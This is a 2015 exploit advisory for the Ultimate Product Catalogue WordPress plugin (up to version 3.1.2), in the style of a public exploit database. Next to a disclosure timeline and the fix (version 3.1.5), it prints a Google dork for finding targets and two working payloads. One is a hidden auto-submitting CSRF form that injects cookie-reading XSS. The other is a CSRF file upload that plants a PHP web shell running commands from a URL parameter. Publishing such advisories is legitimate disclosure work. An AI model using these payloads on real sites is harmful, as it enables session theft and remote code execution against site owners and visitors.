1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144 | # Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary:
Ultimate Product Catalogue is a responsive and easily customizable plugin
for all your product catalogue needs. It has +63.000 downloads, +4.000
active installations.
Product Name and Description and File Upload formulary of plugin Ultimate
Product Catalog lacks of proper CSRF protection and proper filtering.
Allowing an attacker to alter a product pressented to a customer or the
wordpress administrators and insert XSS in his product name and
description. It also allows an attacker to upload a php script though a
CSRF due to a lack of file type filtering when uploading it.
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com
and fixed two SQLi in 3.1.3 but not these vulnerabilities.
- 28/04/2015: Fixed version in 3.1.5 without notifying me.
3. Vulnerable code:
In file html/ProductPage multiple lines.
3. Proof of concept:
https://www.youtube.com/watch?v=roB_ken6U4o
----------------------------------------------------------------------------------------------
------------- CSRF & XSS in Product Description and Name -----------
----------------------------------------------------------------------------------------------
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
action='http://
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
target="csrf-frame"
id="csrf-form">
<input type='hidden' name='action' value='Edit_Product'>
<input type='hidden' name='_wp_http_referer'
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
<input type='hidden' name='Item_Name' value="Product
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
<input type='hidden' name='Item_Slug' value='asdf'/>
<input type='hidden' name='Item_ID' value='16'/>
<input type='hidden' name='Item_Image' value='
http://i.imgur.com/6cWKujq.gif'>
<input type='hidden' name='Item_Price' value='666'>
<input type='hidden' name='Item_Description' value="Product
description says<script>alert('Product description says:
'+document.cookie)</script>"/>
<input type='hidden' name='Item_SEO_Description' value='seo desc'>
<input type='hidden' name='Item_Link' value=''>
<input type='hidden' name='Item_Display_Status' value='Show'>
<input type='hidden' name='Category_ID' value=''>
<input type='hidden' name='SubCategory_ID' value=''>
<input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
----------------------------------------------------------------------------------------------
-------- CSRF & File Upload in Product Description and Name ------
----------------------------------------------------------------------------------------------
<html>
<body onload="submitRequest();">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",
true);
xhr.setRequestHeader("Host", "<web>");
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Cache-Control", "max-age=0");
xhr.setRequestHeader("Accept-Language",
"en-US,en;q=0.8,es;q=0.6");
xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37
Safari/537.36");
xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
"Content-Disposition: form-data;
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<?php\r\n" +
"exec($_GET['c'],$output);\r\n" +
"foreach ($output as $line) {\r\n" +
"echo \"<br/>\".$line;\r\n" +
"}\r\n" +
"?>\r\n" +
"------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
"Content-Disposition: form-data; name='submit'\r\n" +
"\r\n" +
"Add New Products\r\n" +
"------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
</form>
</body>
</html>
Te file cooldog.php is no available in path http://
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php
4. Solution:
Update to version 3.1.5
|